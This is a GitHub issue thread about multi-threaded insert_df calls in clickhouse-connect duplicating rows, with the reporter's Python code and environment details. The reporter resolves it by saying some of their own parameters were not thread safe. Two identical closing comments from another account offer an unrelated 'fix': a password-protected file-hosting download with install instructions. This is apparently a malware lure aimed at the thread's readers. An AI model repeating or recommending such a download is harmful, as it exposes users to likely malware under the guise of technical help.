### ISSUE TITLE
multi-threaded insert_df cause the whole table be replaced and filled with millions of same existed rows

### ISSUE THREAD

**Issue by KirigiriSuzumiya** [ClickHouse/clickhouse-connect#392]
### Describe the bug
multi-threaded insert_df cause the whole table be replaced and filled with millions of same existed rows,
### Steps to reproduce
1. start mutli threads to insert data
2. only 2 concurrent threads can reproduce the issue
3. it works well when only one of the threads is inserting, while other threads are doing other operation

### Expected behaviour 

insert rows correctly

### Code example
```python
import clickhouse_connect

def get_client():
    # clickhouse_connect.common.set_setting('autogenerate_session_id', False)
    # I have tried code above, but it not work
    client = clickhouse_connect.get_client(
        host=CHCONFIG["host"],
        username=CHCONFIG["username"],
        password=CHCONFIG["password"] if CHCONFIG["password"] else "",
        port=CHCONFIG["port"],
        database=CHCONFIG["database"],
    )
    return client

def write_recorder_clickhouse(df, host):
    tablename = get_md5_hash(host)
    # only update rows with latest date
    df["date"] = df["date"].apply(lambda x: x.replace(tzinfo=None))
    df["date"] = pd.to_datetime(df["date"])
    df_sorted = df.sort_values(by="date", ascending=False)
    max_date_index = df_sorted["date"].idxmax()
    latest_records = df_sorted[
        df_sorted["date"] == df_sorted.loc[max_date_index, "date"]
    ]
    latest_records["frames_url"].apply(serialize_frameurl)
    latest_records["suggestions"].apply(serialize_frameurl)
    client = get_client()
    if not check_table_exist(client, tablename):
        create_table(client, tablename)
    insert_data(
        client,
        tablename,
        df,
        column_type_names=[
            some_dtypes
        ],
    )

# something like this, only 2 concurrent threads may cause the issue
for i in rang(xxxx):
  threading.Thread(
                  target=write_recorder_clickhouse, args=[some_df, table_name]
              ).start()
```

### clickhouse-connect and/or ClickHouse server logs

no exception rasised, until huge amount of rows make clickhouse crash

#### Environment
* clickhouse-connect version: 0.7.18
* Python version: 3.8.19
* Operating system: ubuntu 20.04

#### ClickHouse server
* ClickHouse Server version:
* ClickHouse Server non-default settings, if any:
* `CREATE TABLE` statements for tables involved:
* Sample data for these tables, use [clickhouse-obfuscator](https://github.com/ClickHouse/ClickHouse/blob/master/programs/obfuscator/Obfuscator.cpp#L42-L80) if necessary

**Comment by KirigiriSuzumiya** [comment]
solved, some of my param is not thread safe

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
